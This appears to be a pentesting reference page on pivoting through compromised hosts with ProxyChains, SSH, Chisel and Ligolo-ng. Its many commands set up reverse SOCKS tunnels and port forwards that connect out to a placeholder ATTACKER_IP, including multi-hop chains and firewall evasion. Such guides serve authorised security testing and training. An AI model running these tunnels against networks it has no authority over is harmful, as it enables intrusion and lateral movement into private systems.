Pivoting & Tunneling
Network pivoting and tunneling techniques to access isolated network segments through compromised hosts.
Overview
| Tool | Type | Use Case |
|---|---|---|
| ProxyChains | SOCKS Proxy | Route tools through compromised host |
| Chisel | Fast TCP/UDP Tunnels | Modern tunneling with reverse connections |
| Ligolo-ng | Layer 3 Tunnel | Full network layer tunneling |
ProxyChains
Routes traffic from pentesting tools through SOCKS proxies.
Configuration
Edit /etc/proxychains4.conf or ~/.proxychains/proxychains.conf:
# Dynamic chain - goes through all proxies in order
dynamic_chain
# Quiet mode (less output)
quiet_mode
# Proxy DNS requests
proxy_dns
# Proxy list
[ProxyList]
socks4 127.0.0.1 1080
socks5 127.0.0.1 1081
SSH SOCKS Proxy
Create a SOCKS proxy through SSH:
# Local SOCKS proxy on port 1080
ssh -D 1080 user@compromised-host
# Background with no shell
ssh -fN -D 1080 user@compromised-host
# With key authentication
ssh -i id_rsa -D 1080 user@compromised-host
Using ProxyChains
# Run nmap through proxy
proxychains nmap -sT -Pn 10.10.10.5
# Run curl through proxy
proxychains curl http://internal-web-server
# Run msfconsole
proxychains msfconsole
# Multiple proxies (edit config first)
proxychains4 -f custom.conf nmap -sT 172.16.0.5
ProxyChains Limitations
- Only works with TCP
- Some tools may not work correctly
- DNS leaks possible if not configured properly
- Slower than direct connections
Chisel
Fast TCP/UDP tunnel over HTTP, secured via SSH. Great for bypassing firewalls and creating reverse tunnels.
Installation
# Download latest release
wget https://github.com/jpillora/chisel/releases/download/v1.11.3/chisel_1.11.3_linux_amd64.gz
gunzip chisel_1.11.3_linux_amd64.gz
chmod +x chisel_1.11.3_linux_amd64
mv chisel_1.11.3_linux_amd64 chisel
# Or build from source
go install github.com/jpillora/chisel@latest
Reverse SOCKS Proxy
Most common scenario - compromised host has outbound access only.
On your attack machine (server):
# Start chisel server
./chisel server -p 8080 --reverse
# With authentication
./chisel server -p 8080 --reverse --auth user:pass
# Verbose mode
./chisel server -p 8080 --reverse -v
On compromised host (client):
# Connect and create SOCKS proxy on attacker's localhost:1080
./chisel client ATTACKER_IP:8080 R:socks
# With authentication
./chisel client --auth user:pass ATTACKER_IP:8080 R:socks
# Specify SOCKS port
./chisel client ATTACKER_IP:8080 R:1081:socks
Use the proxy:
Forward Port Forwarding
Forward a specific port from the compromised host to your machine.
On your attack machine (server):
On compromised host (client):
# Forward internal service to attacker's port 8000
./chisel client ATTACKER_IP:8080 R:8000:localhost:80
# Forward remote host through tunnel
./chisel client ATTACKER_IP:8080 R:3389:10.10.10.5:3389
Access the service:
# RDP to internal host
xfreerdp /v:127.0.0.1:3389 /u:admin
# Access web service
curl http://127.0.0.1:8000
Local Port Forwarding
When you can connect TO the compromised host.
On compromised host (server):
On your attack machine (client):
# Create SOCKS proxy
./chisel client COMPROMISED_IP:8080 socks
# Port forward
./chisel client COMPROMISED_IP:8080 8001:localhost:80
Multiple Tunnels
# Multiple port forwards
./chisel client ATTACKER_IP:8080 \
R:3389:10.10.10.5:3389 \
R:445:10.10.10.5:445 \
R:80:10.10.10.6:80
# Combine SOCKS and port forwards
./chisel client ATTACKER_IP:8080 \
R:socks \
R:8080:internal-server:80
Chisel Over HTTP/HTTPS
# Server with TLS
./chisel server -p 443 --reverse --tls-key key.pem --tls-cert cert.pem
# Client connecting to HTTPS
./chisel client https://ATTACKER_IP:443 R:socks
# Through HTTP proxy
./chisel client --proxy http://proxy:8080 ATTACKER_IP:8080 R:socks
Ligolo-ng
Modern successor to Ligolo - creates a full layer 3 tunnel, allowing you to route entire subnets.
Setup
On your attack machine:
- Download releases from https://github.com/nicocha30/ligolo-ng/releases
# Download and extract
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
tar xvf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
tar xvf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
# Create TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
- Start the proxy:
On compromised host (agent):
# Connect to proxy
./agent -connect ATTACKER_IP:11601 -ignore-cert
# With retry on disconnect
./agent -connect ATTACKER_IP:11601 -ignore-cert -retry
Routing Networks
In the ligolo-ng proxy console:
# List sessions
>> session
# Select a session
>> session 1
# Show available networks from agent
>> ifconfig
# Add route to access 10.10.10.0/24 network
>> session 1
>> start
# On attack machine in another terminal:
sudo ip route add 10.10.10.0/24 dev ligolo
# Now you can directly access the internal network
nmap -sV 10.10.10.5
curl http://10.10.10.6
Port Forwarding with Ligolo
Listener on agent forwards to your attacker machine:
# In proxy console
>> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
# Now connections to compromised_host:1234 forward to attacker:4444
# Useful for reverse shells
Multiple Pivots
Chain through multiple compromised hosts:
# First pivot: attacker -> host1
sudo ip route add 192.168.1.0/24 dev ligolo
# Second agent on host1 connects back through tunnel
# Add route for host2's network
sudo ip route add 172.16.0.0/24 dev ligolo
Ligolo-ng vs Chisel
| Feature | Ligolo-ng | Chisel |
|---|---|---|
| Network Layer | Layer 3 (IP) | Layer 4 (TCP/UDP) |
| Setup Complexity | Requires TUN interface | Simple binary |
| Performance | Faster | Slightly slower |
| Firewall Evasion | Good (TLS) | Good (HTTP/HTTPS) |
| Multiple Protocols | All IP protocols | TCP/UDP only |
| Use Case | Full network access | Specific services/SOCKS |
Comparison & Use Cases
When to Use ProxyChains
- ✅ Simple SSH access available
- ✅ Need to route specific tools
- ✅ Quick and temporary access
- ❌ Need UDP support
- ❌ High performance required
When to Use Chisel
- ✅ Need reverse tunnels (outbound only)
- ✅ Firewall evasion required
- ✅ Simple port forwards
- ✅ SOCKS proxy needed
- ❌ Need full network routing
When to Use Ligolo-ng
- ✅ Need access to entire subnet
- ✅ Multiple protocols (not just TCP)
- ✅ Complex network pivoting
- ✅ Best performance
- ❌ Can't create TUN interface
- ❌ Need simple quick setup
Double/Triple Pivoting
Access networks multiple hops away.
With SSH + ProxyChains
# First hop
ssh -D 1080 user@host1
# Second hop (through first)
proxychains ssh -D 1081 user@host2
# Update proxychains.conf
[ProxyList]
socks5 127.0.0.1 1080
socks5 127.0.0.1 1081
# Access third network
proxychains nmap -sT 172.16.0.5
With Chisel Chaining
Attack machine:
Host1 (first pivot):
# Connect to attacker and expose local port 9090
./chisel client ATTACKER_IP:8080 R:9090:127.0.0.1:9090
# Start server on host1
./chisel server -p 9090
Host2 (second pivot):
Now you have SOCKS proxy on 127.0.0.1:1080 reaching host2's network.
With Ligolo-ng Chaining
Attack machine:
Host1:
Host2:
Back on attack machine:
Useful Links
- ProxyChains-ng GitHub
- Chisel GitHub
- Ligolo-ng GitHub
- Ligolo-ng Documentation
- HackTricks Pivoting Guide
- Red Team Notes - Pivoting
- SSH Tunneling Explained
- Metasploit Pivoting
Quick Reference
ProxyChains + SSH
Chisel Reverse SOCKS
# Attacker
./chisel server -p 8080 --reverse
# Target
./chisel client ATTACKER:8080 R:socks
# Use
proxychains -q curl http://internal-host